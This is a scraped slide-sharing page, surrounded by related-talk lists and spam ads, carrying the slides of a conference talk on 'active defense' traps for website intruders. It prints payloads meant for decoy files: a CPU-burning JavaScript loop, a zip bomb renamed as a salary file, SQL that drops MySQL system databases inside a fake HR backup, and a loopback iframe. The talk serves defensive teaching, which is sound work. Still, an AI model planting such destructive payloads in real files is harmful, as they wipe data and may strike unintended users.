Circle City Con: Phishing Forensics - Is it just suspicious or is it malicious?Circle City Con: Phishing Forensics - Is it just suspicious or is it malicious?
Circle City Con: Phishing Forensics - Is it just suspicious or is it malicious?
 
Web Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your websiteWeb Security: What's wrong, and how the bad guys can break your website
Web Security: What's wrong, and how the bad guys can break your website
 
Sql securitytesting
Sql securitytestingSql securitytesting
Sql securitytesting
 
Cybersecurity: Malware & Protecting Your Business From Cyberthreats
Cybersecurity: Malware & Protecting Your Business From CyberthreatsCybersecurity: Malware & Protecting Your Business From Cyberthreats
Cybersecurity: Malware & Protecting Your Business From Cyberthreats
 
Information security - what is going on 2016
Information security - what is going on 2016Information security - what is going on 2016
Information security - what is going on 2016
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
 
Computer_Hacking_for_Beginners_Kevin_James_complex.pdf
Computer_Hacking_for_Beginners_Kevin_James_complex.pdfComputer_Hacking_for_Beginners_Kevin_James_complex.pdf
Computer_Hacking_for_Beginners_Kevin_James_complex.pdf
 
Irm 6-website-defacement
Irm 6-website-defacementIrm 6-website-defacement
Irm 6-website-defacement
 
Andrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.pptAndrews whitakrer lecture18-security.ppt
Andrews whitakrer lecture18-security.ppt
 
Secure client
Secure clientSecure client
Secure client
 
Mc physics colloquium2018-03-30.-handouts
Mc physics colloquium2018-03-30.-handoutsMc physics colloquium2018-03-30.-handouts
Mc physics colloquium2018-03-30.-handouts
 
Owasp top 10 2013
Owasp top 10 2013Owasp top 10 2013
Owasp top 10 2013
 
BSides Cleveland: Phishing Forensics - Is it just suspicious or is it malicious?
BSides Cleveland: Phishing Forensics - Is it just suspicious or is it malicious?BSides Cleveland: Phishing Forensics - Is it just suspicious or is it malicious?
BSides Cleveland: Phishing Forensics - Is it just suspicious or is it malicious?
 
Keynote at the Cyber Security Summit Prague 2015
Keynote at the Cyber Security Summit Prague 2015Keynote at the Cyber Security Summit Prague 2015
Keynote at the Cyber Security Summit Prague 2015
 
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security Team
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security TeamSecrets of Google VRP by: Krzysztof Kotowicz, Google Security Team
Secrets of Google VRP by: Krzysztof Kotowicz, Google Security Team
 
Security testing
Security testingSecurity testing
Security testing
 
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers - [ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
[ENG] OHM2013 - The Quest for the Client-Side Elixir Against Zombie Browsers -
 

Mehr von ThreatReel Podcast

CONHESI 2021 - Exploiting Web APIs
CONHESI 2021 - Exploiting Web APIsCONHESI 2021 - Exploiting Web APIs
CONHESI 2021 - Exploiting Web APIsThreatReel Podcast
 
BSides Columbus - Lend me your IR's!
BSides Columbus - Lend me your IR's!BSides Columbus - Lend me your IR's!
BSides Columbus - Lend me your IR's!ThreatReel Podcast
 
PwnSchool: Exploiting Web APIs
PwnSchool: Exploiting Web APIsPwnSchool: Exploiting Web APIs
PwnSchool: Exploiting Web APIsThreatReel Podcast
 
CiNPA Security SIG - Exploiting the Tiredful API
CiNPA Security SIG - Exploiting the Tiredful APICiNPA Security SIG - Exploiting the Tiredful API
CiNPA Security SIG - Exploiting the Tiredful APIThreatReel Podcast
 
OISF - Continuous Skills Improvement for Everyone
OISF - Continuous Skills Improvement for EveryoneOISF - Continuous Skills Improvement for Everyone
OISF - Continuous Skills Improvement for EveryoneThreatReel Podcast
 
Central Ohio InfoSec Summit: Why Script Kiddies Succeed
Central Ohio InfoSec Summit: Why Script Kiddies SucceedCentral Ohio InfoSec Summit: Why Script Kiddies Succeed
Central Ohio InfoSec Summit: Why Script Kiddies SucceedThreatReel Podcast
 
OISC 2019 - The OWASP Top 10 & AppSec Primer
OISC 2019 - The OWASP Top 10 & AppSec PrimerOISC 2019 - The OWASP Top 10 & AppSec Primer
OISC 2019 - The OWASP Top 10 & AppSec PrimerThreatReel Podcast
 
Butler Tech - Working in IT and InfoSec
Butler Tech - Working in IT and InfoSecButler Tech - Working in IT and InfoSec
Butler Tech - Working in IT and InfoSecThreatReel Podcast
 
CiNPA Security SIG - Physical Security
CiNPA Security SIG - Physical SecurityCiNPA Security SIG - Physical Security
CiNPA Security SIG - Physical SecurityThreatReel Podcast
 
CiNPA / CiNPA Security SIG History
CiNPA / CiNPA Security SIG HistoryCiNPA / CiNPA Security SIG History
CiNPA / CiNPA Security SIG HistoryThreatReel Podcast
 
CiNPA Security SIG - AppSec Presentation
CiNPA Security SIG - AppSec PresentationCiNPA Security SIG - AppSec Presentation
CiNPA Security SIG - AppSec PresentationThreatReel Podcast
 
OISF: Regular Expressions (Regex) Overview
OISF: Regular Expressions (Regex) OverviewOISF: Regular Expressions (Regex) Overview
OISF: Regular Expressions (Regex) OverviewThreatReel Podcast
 
DerbyCon 7.0 Legacy: Regular Expressions (Regex) Overview
DerbyCon 7.0 Legacy: Regular Expressions (Regex) OverviewDerbyCon 7.0 Legacy: Regular Expressions (Regex) Overview
DerbyCon 7.0 Legacy: Regular Expressions (Regex) OverviewThreatReel Podcast
 
CiNPA Security SIG - Regex Presentation
CiNPA Security SIG - Regex PresentationCiNPA Security SIG - Regex Presentation
CiNPA Security SIG - Regex PresentationThreatReel Podcast
 
DerbyCon: Surveillance Using Spare Stuff
DerbyCon: Surveillance Using Spare StuffDerbyCon: Surveillance Using Spare Stuff
DerbyCon: Surveillance Using Spare StuffThreatReel Podcast
 

Mehr von ThreatReel Podcast (20)

CONHESI 2021 - Exploiting Web APIs
CONHESI 2021 - Exploiting Web APIsCONHESI 2021 - Exploiting Web APIs
CONHESI 2021 - Exploiting Web APIs
 
SecureWV: Exploiting Web APIs
SecureWV: Exploiting Web APIsSecureWV: Exploiting Web APIs
SecureWV: Exploiting Web APIs
 
BSides Columbus - Lend me your IR's!
BSides Columbus - Lend me your IR's!BSides Columbus - Lend me your IR's!
BSides Columbus - Lend me your IR's!
 
PwnSchool: Exploiting Web APIs
PwnSchool: Exploiting Web APIsPwnSchool: Exploiting Web APIs
PwnSchool: Exploiting Web APIs
 
CiNPA Security SIG - Exploiting the Tiredful API
CiNPA Security SIG - Exploiting the Tiredful APICiNPA Security SIG - Exploiting the Tiredful API
CiNPA Security SIG - Exploiting the Tiredful API
 
CCC - Lend me your IR's
CCC - Lend me your IR'sCCC - Lend me your IR's
CCC - Lend me your IR's
 
ISC2: AppSec & OWASP Primer
ISC2: AppSec & OWASP PrimerISC2: AppSec & OWASP Primer
ISC2: AppSec & OWASP Primer
 
OISF - Continuous Skills Improvement for Everyone
OISF - Continuous Skills Improvement for EveryoneOISF - Continuous Skills Improvement for Everyone
OISF - Continuous Skills Improvement for Everyone
 
Central Ohio InfoSec Summit: Why Script Kiddies Succeed
Central Ohio InfoSec Summit: Why Script Kiddies SucceedCentral Ohio InfoSec Summit: Why Script Kiddies Succeed
Central Ohio InfoSec Summit: Why Script Kiddies Succeed
 
AppSec & OWASP Top 10 Primer
AppSec & OWASP Top 10 PrimerAppSec & OWASP Top 10 Primer
AppSec & OWASP Top 10 Primer
 
OISC 2019 - The OWASP Top 10 & AppSec Primer
OISC 2019 - The OWASP Top 10 & AppSec PrimerOISC 2019 - The OWASP Top 10 & AppSec Primer
OISC 2019 - The OWASP Top 10 & AppSec Primer
 
Butler Tech - Working in IT and InfoSec
Butler Tech - Working in IT and InfoSecButler Tech - Working in IT and InfoSec
Butler Tech - Working in IT and InfoSec
 
CiNPA Security SIG - Physical Security
CiNPA Security SIG - Physical SecurityCiNPA Security SIG - Physical Security
CiNPA Security SIG - Physical Security
 
CiNPA / CiNPA Security SIG History
CiNPA / CiNPA Security SIG HistoryCiNPA / CiNPA Security SIG History
CiNPA / CiNPA Security SIG History
 
OISF - AppSec Presentation
OISF - AppSec PresentationOISF - AppSec Presentation
OISF - AppSec Presentation
 
CiNPA Security SIG - AppSec Presentation
CiNPA Security SIG - AppSec PresentationCiNPA Security SIG - AppSec Presentation
CiNPA Security SIG - AppSec Presentation
 
OISF: Regular Expressions (Regex) Overview
OISF: Regular Expressions (Regex) OverviewOISF: Regular Expressions (Regex) Overview
OISF: Regular Expressions (Regex) Overview
 
DerbyCon 7.0 Legacy: Regular Expressions (Regex) Overview
DerbyCon 7.0 Legacy: Regular Expressions (Regex) OverviewDerbyCon 7.0 Legacy: Regular Expressions (Regex) Overview
DerbyCon 7.0 Legacy: Regular Expressions (Regex) Overview
 
CiNPA Security SIG - Regex Presentation
CiNPA Security SIG - Regex PresentationCiNPA Security SIG - Regex Presentation
CiNPA Security SIG - Regex Presentation
 
DerbyCon: Surveillance Using Spare Stuff
DerbyCon: Surveillance Using Spare StuffDerbyCon: Surveillance Using Spare Stuff
DerbyCon: Surveillance Using Spare Stuff
 

Kürzlich hochgeladen

PowerDirector Explination Process...pptx
PowerDirector Explination Process...pptxPowerDirector Explination Process...pptx
PowerDirector Explination Process...pptxgalaxypingy
 
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样ayvbos
 
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrStory Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrHenryBriggs2
 
Russian Escort Abu Dhabi 0503464457 Abu DHabi Escorts
Russian Escort Abu Dhabi 0503464457 Abu DHabi EscortsRussian Escort Abu Dhabi 0503464457 Abu DHabi Escorts
Russian Escort Abu Dhabi 0503464457 Abu DHabi EscortsMonica Sydney
 
Meaning of On page SEO & its process in detail.
Meaning of On page SEO & its process in detail.Meaning of On page SEO & its process in detail.
Meaning of On page SEO & its process in detail.krishnachandrapal52
 
在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查ydyuyu
 
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样ayvbos
 
Real Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirtReal Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirtrahman018755
 
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
20240509 QFM015 Engineering Leadership Reading List April 2024.pdfMatthew Sinclair
 
Trump Diapers Over Dems t shirts Sweatshirt
Trump Diapers Over Dems t shirts SweatshirtTrump Diapers Over Dems t shirts Sweatshirt
Trump Diapers Over Dems t shirts Sweatshirtrahman018755
 
Microsoft Azure Arc Customer Deck Microsoft
Microsoft Azure Arc Customer Deck MicrosoftMicrosoft Azure Arc Customer Deck Microsoft
Microsoft Azure Arc Customer Deck MicrosoftAanSulistiyo
 
Power point inglese - educazione civica di Nuria Iuzzolino
Power point inglese - educazione civica di Nuria IuzzolinoPower point inglese - educazione civica di Nuria Iuzzolino
Power point inglese - educazione civica di Nuria Iuzzolinonuriaiuzzolino1
 
Best SEO Services Company in Dallas | Best SEO Agency Dallas
Best SEO Services Company in Dallas | Best SEO Agency DallasBest SEO Services Company in Dallas | Best SEO Agency Dallas
Best SEO Services Company in Dallas | Best SEO Agency DallasDigicorns Technologies
 
Indian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi EscortsIndian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi EscortsMonica Sydney
 
20240510 QFM016 Irresponsible AI Reading List April 2024.pdf
20240510 QFM016 Irresponsible AI Reading List April 2024.pdf20240510 QFM016 Irresponsible AI Reading List April 2024.pdf
20240510 QFM016 Irresponsible AI Reading List April 2024.pdfMatthew Sinclair
 
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...APNIC
 
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
20240507 QFM013 Machine Intelligence Reading List April 2024.pdfMatthew Sinclair
 
75539-Cyber Security Challenges PPT.pptx
75539-Cyber Security Challenges PPT.pptx75539-Cyber Security Challenges PPT.pptx
75539-Cyber Security Challenges PPT.pptxAsmae Rabhi
 
"Boost Your Digital Presence: Partner with a Leading SEO Agency"
"Boost Your Digital Presence: Partner with a Leading SEO Agency""Boost Your Digital Presence: Partner with a Leading SEO Agency"
"Boost Your Digital Presence: Partner with a Leading SEO Agency"growthgrids
 
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查ydyuyu
 

Kürzlich hochgeladen (20)

PowerDirector Explination Process...pptx
PowerDirector Explination Process...pptxPowerDirector Explination Process...pptx
PowerDirector Explination Process...pptx
 
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样
一比一原版(Flinders毕业证书)弗林德斯大学毕业证原件一模一样
 
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrStory Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
 
Russian Escort Abu Dhabi 0503464457 Abu DHabi Escorts
Russian Escort Abu Dhabi 0503464457 Abu DHabi EscortsRussian Escort Abu Dhabi 0503464457 Abu DHabi Escorts
Russian Escort Abu Dhabi 0503464457 Abu DHabi Escorts
 
Meaning of On page SEO & its process in detail.
Meaning of On page SEO & its process in detail.Meaning of On page SEO & its process in detail.
Meaning of On page SEO & its process in detail.
 
在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查
 
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
 
Real Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirtReal Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirt
 
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
20240509 QFM015 Engineering Leadership Reading List April 2024.pdf
 
Trump Diapers Over Dems t shirts Sweatshirt
Trump Diapers Over Dems t shirts SweatshirtTrump Diapers Over Dems t shirts Sweatshirt
Trump Diapers Over Dems t shirts Sweatshirt
 
Microsoft Azure Arc Customer Deck Microsoft
Microsoft Azure Arc Customer Deck MicrosoftMicrosoft Azure Arc Customer Deck Microsoft
Microsoft Azure Arc Customer Deck Microsoft
 
Power point inglese - educazione civica di Nuria Iuzzolino
Power point inglese - educazione civica di Nuria IuzzolinoPower point inglese - educazione civica di Nuria Iuzzolino
Power point inglese - educazione civica di Nuria Iuzzolino
 
Best SEO Services Company in Dallas | Best SEO Agency Dallas
Best SEO Services Company in Dallas | Best SEO Agency DallasBest SEO Services Company in Dallas | Best SEO Agency Dallas
Best SEO Services Company in Dallas | Best SEO Agency Dallas
 
Indian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi EscortsIndian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
Indian Escort in Abu DHabi 0508644382 Abu Dhabi Escorts
 
20240510 QFM016 Irresponsible AI Reading List April 2024.pdf
20240510 QFM016 Irresponsible AI Reading List April 2024.pdf20240510 QFM016 Irresponsible AI Reading List April 2024.pdf
20240510 QFM016 Irresponsible AI Reading List April 2024.pdf
 
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
APNIC Policy Roundup, presented by Sunny Chendi at the 5th ICANN APAC-TWNIC E...
 
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
20240507 QFM013 Machine Intelligence Reading List April 2024.pdf
 
75539-Cyber Security Challenges PPT.pptx
75539-Cyber Security Challenges PPT.pptx75539-Cyber Security Challenges PPT.pptx
75539-Cyber Security Challenges PPT.pptx
 
"Boost Your Digital Presence: Partner with a Leading SEO Agency"
"Boost Your Digital Presence: Partner with a Leading SEO Agency""Boost Your Digital Presence: Partner with a Leading SEO Agency"
"Boost Your Digital Presence: Partner with a Leading SEO Agency"
 
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
 

BSides Cincy: Active Defense - Helping threat actors hack themselves!

  • 1. Active Defense Helping Threat Actors Hack Themselves! May 12, 2018 Matt Scheurer @c3rkah Slides: https://www.slideshare.net/cerkah
  • 2. About Me Matt Scheurer Systems Security Engineer with First Financial Bank Chair for the CiNPA Security SIG Speaker at DerbyCon 5.0, DerbyCon 7.0, the 10th Annual NKU Cyber Security Symposium, BSides Columbus 5.0, and BSides Indianapolis 2018 Certifications: CompTIA Security+, MCP, MCPS, MCTS, MCSA, and MCITP
  • 3. Yes, I have a day job. However...Yes, I have a day job. However... Opinions expressed are solely my own and do not express the views or opinions of my employer.
  • 4. Legal DisclaimerLegal Disclaimer The material presented is made available for informational and educational purposes only. Use of these tools and techniques is at your own risk! The presenter hereby disclaims any and all liability to any party for any direct, indirect, implied, punitive, special, incidental or other consequential damages arising directly or indirectly from any use of these materials, which are provided as is, and without warranties.
  • 5. What is Active Defense?What is Active Defense? Active defense can refer to a defensive strategy in the military or cybersecurity arena. The Department of Defense defines active defense as: "The employment of limited offensive action and counterattacks to deny a contested area or position to the enemy.” In the cybersecurity arena, active defense may mean "asymmetric defenses," namely defenses that increase costs to cyber-adversaries by reducing costs to cyber- defenders. ● Source: https://en.wikipedia.org/wiki/Active_Defense
  • 6. Why Active Defense?Why Active Defense? 1.Because “Hacking Back” is illegal! 2.Active Defense is the next level beyond honeypots, honeyfiles, and honeynets
  • 7. Our ObjectivesOur Objectives 1.Shield and protect legitimate users at all times! ● Be diligent about protecting innocent site visitors... 2.Frustrate malicious threat actors attempting to steal and ex-filtrate data through unauthorized access ● Preferably by unwittingly hacking themselves... 3.See Objective #1!
  • 8. Presentation FocusPresentation Focus ● Active Defense for a website ● Baiting and setting traps for script kiddies and other cyber criminals
  • 9. InspirationsInspirations ● Aikido – Using an opponents energy / force against them ● My Father – Junk mail counter-strikes ● Nature – Animal Defenses ● Nostalgia – Everything old is new again... ● Security Minded – Yet a prankster at heart <3 ● Vigilante Nature – Love seeing the bad guys getting what they deserve!
  • 10. Conventions UsedConventions Used Hot Water Index: ● Escalating thermometer temperature indicates the greater potential of getting reported for hosting malicious content
  • 11. Protecting Legitimate UsersProtecting Legitimate Users ● Create a “robots.txt” file ● Create a Sitemap XML file ● Do not link to Active Defense Content – Use a link / hyperlink checker to verify ● Disable directory indexing on legitimate content ● Potentially protecting yourself by making use of authorized user only messages
  • 12. “robots.txt” files“robots.txt” files Reference: http://www.robotstxt.org/ Example Sitemap: https://cybernnati.com/sitemap.xml User-agent: * Disallow: /cgi-bin/ Disallow: /complex/ # Company Confidential Information Disallow: /docs/ # Company Confidential Information Disallow: /org/ # Company Confidential Information Disallow: /protected/ # Company Confidential Information Disallow: /webmaster/ # Company Confidential Information Disallow: /wp-admin/ # WordPress Administration Files Disallow: /wp-content/ # WordPress CMS Files Disallow: /wp-includes/ # WordPress CMS Files
  • 13. Sitemap XML filesSitemap XML files Reference: https://www.sitemaps.org/protocol.html Example <?xml version="1.0" encoding="utf-8"?> <urlset xmlns="http://www.sitemaps.org/schemas/sitemap/0.9" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.sitemaps.org/schemas/sitemap/0. 9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd"> <url> <loc>http://www.cybernnati.com/</loc> </url> </urlset>
  • 14. Directory IndexesDirectory Indexes As a matter of good web security, disable directory Indexing on all legitimate web content! ● The lone exception for this is with our Active Defense content – This will help ensure that those purposely ignoring the borders and confines defined in our robots.txt and sitemap.xml files find our Active Defense content
  • 15. Authorized Users OnlyAuthorized Users Only Example (README.txt or README.html): ------------- W A R N I N G ------------- THIS IS A PRIVATE AREA OF THIS WEBSITE. This website including all related data and information are provided only for authorized use. All connections and activity may be monitored for all lawful purposes, including to ensure that their use is authorized, for management of the system, to facilitate protection against unauthorized access, and to verify security procedures, survivability and operational security. Monitoring includes active attacks by authorized personnel and their entities to test or verify the security of the system. During monitoring, information may be examined, recorded, copied and used for authorized purposes. All information including personal information, placed on or sent over this system may be monitored. Uses of this system, authorized or unauthorized, constitutes consent to monitoring of this system. Unauthorized use is prohibited! Unauthorized use may subject you to criminal prosecution. Evidence of any such unauthorized use collected during monitoring may be used for administrative, criminal or other adverse action. Use of this system constitutes consent to monitoring for these purposes.
  • 16. The Roundtrip RoundkickThe Roundtrip Roundkick Hot Water Index ● Create a bunch of unused DNS sub-domain host records pointing back to 127.0.0.1 ● The harder the attackers try to hit you at these sub-domains, the harder they are actually hitting themselves
  • 18. Stomachvivor / Gross OutStomachvivor / Gross Out ● Stage an unreferenced folder with a fake door badge ID template – NOTE: Not too similar to one’s you actually use! ● Place “gross-out” pictures of choice disguised as staff photo headshots
  • 19. Phony Photo IDsPhony Photo IDs /complex/buildings/access/2017_headshots/ Guthrie_Ricky.jpeg /complex/buildings/access/ Door_Badge_ID_Template.jpg
  • 20. Reflector MadnessReflector Madness ● Create an easy to crack password protected folder ● What’s waiting inside is not something threat actors will expect...
  • 21. Can you guess my credentials?Can you guess my credentials? .htaccess file: AuthType Basic AuthName "protected" AuthUserFile "/home2/<SNIP>/.htpas swds/public_html/protec ted/passwd" require valid-user ● HINT: It’s possibly one of the worst username and password combinations you could have on a network device
  • 22. Reward for cracking the login is?Reward for cracking the login is? ● Probably this… ● But maybe this!
  • 23. Inside the source codeInside the source code ● A no borders iFrame pointing back to the loopback address... – If an attacker is running a web server locally on their system then they may potentially attack themselves <!DOCTYPE html> <html dir="ltr" lang="en-us"> <head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"> <title>CyberNnati</title> </head> <body style="margin: 0px; padding: 0px; overflow: hidden"> <div> <iframe src="http://127.0.0.1/" style="position: absolute; width: 100%; height: 100%; border: none"> </iframe> </div> </body> </html>
  • 24. Going Nowhere Fast!Going Nowhere Fast! ● WordPress is by far the most deployed CMS in the World powering countless web sites ● Consequently the WordPress login page is one the most targeted for brute force attacks by malicious threat actors
  • 25. Try Guessing my Credentials Now?Try Guessing my Credentials Now? This is a live “wp-login.php” page:
  • 26. What went wrong?What went wrong? The web page you just saw was a completely fabricated WordPress login page. And there is absolutely no real username or password. The goal is to have brute force attackers spin their wheels thus wasting their time, energy, and resources! This is further sold by planting the appropriate folder structure and default files that give away a site as a WordPress site.
  • 27. Pi to the FacePi to the Face ● There is quite a bit to unpack for this Active Defense strategy... – From disinformation, to wasting attackers time, to potentially getting them banned from larger service providers, to burning their CPU cycles and draining batteries ● We start by using the enterprising cyber criminals own CryptoJacking techniques against them...
  • 28. The Setup...The Setup... ● Have a “webmaster” folder containing a fictitious “bookmarks.html” file ● Stage non-existent login account links for popular sites and services an attacker might waste time attempting to brute force – Hopefully they trip whatever alert thresholds these service providers may have in place resulting in a ban or being reported to a threat intelligence feed! ● Behind the scenes we are computationally calculating Pi hundreds of thousands of times – Wash, rinse, repeat!
  • 29. Inside “bookmarks.html”Inside “bookmarks.html” Facebook: https://www.facebook.com/login.php?email=webmaster@cybernnati.com Google: https://mail.google.com/mail/u/?authuser=webmaster@cybernnati.com LinkedIn: https://www.linkedin.com/uas/login?email=webmaster@cybernnati.com Microsoft LiveID: https://login.live.com/login.srf?email=webmaster@cybernnati.com Twitter: https://twitter.com/login?username_or_email=webmaster@cybernnati.com Yahoo: https://login.yahoo.com/config/login?username=webmaster@cybernnati.com
  • 30. Source CodeSource Code bookmarks.html Inside the <head> and </head> tags: <meta http-equiv="refresh" content="3.14"> Right before the </body> and </html> tags: <script src="./scripts/includes.js"></scr ipt> <script src="./scripts/pinapall.js"></scri pt> includes.js / pinapall.js var pinapall=0; var zzz=1; var enumeration=314159265; for (i=0;i<=enumeration;i++) { pinapall=pinapall+(4/zzz)-(4/ (zzz+2)) zzz=zzz+4 }
  • 31. CPU Impacts to AttackersCPU Impacts to Attackers ● On a low powered system or dual-core VM this can spike the CPU up to 100% ● On a moderately powered system this may spike the CPU up to 50% – If they are already running a heavy CPU load then this will effectively spike the CPU all the way – Not uncommon with Java based tools like Burp ● Heavy CPU loads will drain batteries on mobile devices, including laptops, at a notably accelerated rate
  • 32. The Wrong AnswerThe Wrong Answer ● Ever have to recover a system with a 100% full disk drive? ● Stage a file with an enticing name inside of an unreferenced folder such as: /docs/hr/employee_salary_history.xlsx.zip ● Which is really just a renamed version of the infamous “42.zip” file!
  • 33. What is “42.zip”?What is “42.zip”? 42.zip is an approximately 42kb compressed zip file. Fully uncompressed the extracted files expand out to upwards of 4.2 Petabytes of data! ● Most data thieving cyber criminals won’t have a hard drive that large… :)
  • 34. Bobby DropkickBobby Dropkick Cartoon From: https://xkcd.com/327/ Titled: “Exploits of a Mom”
  • 35. The SetupThe Setup ● Stage a fake employee database dump file inside of an unreferenced folder: i.e., /org/departments/human_resources/ ● Give the file an enticing name such as: 2017-12-05_hris_employee_mysql_db_backup.zip - OR - 2017-12-05_hris_employee_mysql_db_backup.sql
  • 36. What Else is Inside?What Else is Inside? Just a little SQL code to permanently wipe out the MySQL internal databases... DROP DATABASE mysql; DROP DATABASE sys; DROP DATABASE performance_schema; DROP DATABASE information_schema; If you thought recovering from a full disk situation was a hassle… :)
  • 37. Alternative Active Defense OptionsAlternative Active Defense Options https://www.blackhillsinfosec.com/projects/adhd/ SEC550: Active Defense, Offensive Countermeasures and Cyber Deception https://www.sans.org/course/active- defense-offensive-countermeasures- and-cyber-deception
  • 38. Criticisms, I’ve received a few...Criticisms, I’ve received a few... ● You should make the “Reflector Madness” login harder to crack – You’re in control... – Make it as simple or difficult to defeat as you like! ● This would make a legitimate penetration test more difficult – Have good documentation prepared in advance for white box or gray box engagements – An advance explanation of your robots.txt and sitemap should provide guidance
  • 39. Other expressed concerns...Other expressed concerns... ● “We’re not going to implement this, it might really tick off some skilled attackers and vindictive types!” – Malicious threat actors are mostly undeterred today ● They do not fear retribution for their actions ● That is why they keep compromising vulnerable systems – The fact that Brian Krebs is still alive today is a testament to not living in fear of what might happen ● Krebs adversaries ultimately respect him more for continuing his work ● Still not convinced in implementing Active Defense strategies? – Then simply don’t implement them!
  • 40. QuestionsQuestions Who ... What ... When ... Where ... Why ... How ...
  • 41. Thank you for attending! May 12, 2018 Matt Scheurer @c3rkah Slides: https://www.slideshare.net/cerkah